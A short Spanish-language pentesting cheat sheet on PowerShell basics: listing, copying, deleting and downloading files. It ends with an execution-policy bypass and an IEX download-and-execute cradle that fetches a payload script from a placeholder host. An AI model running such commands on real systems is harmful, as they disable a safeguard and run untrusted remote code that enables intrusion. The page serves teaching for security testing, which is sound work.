PowerShell en Windows
PowerShell es una shell más avanzada y potente que CMD, y su binario se encuentra en:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Comandos Esenciales para Pentesters
Ejecutar Comandos Básicos:
Get-ChildItem -Path C:\ruta\del\directorio
Copiar Archivos:
Copy-Item -Path archivo_origen -Destination archivo_destino
Eliminar Archivos:
Remove-Item -Path archivo
Descargar Archivos desde la Web:
Invoke-WebRequest -Uri http://example.com/file.txt -OutFile C:\ruta\file.txt
Información Relevante
Bypass de Ejecución de Scripts: PowerShell puede estar configurado para bloquear la ejecución de scripts por políticas de seguridad. Para omitir esta restricción:
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
Exploits y Payloads: PowerShell es una herramienta potente para la ejecución de payloads en pentesting, como los scripts de PowerSploit:
IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1')
Última actualización
¿Te fue útil?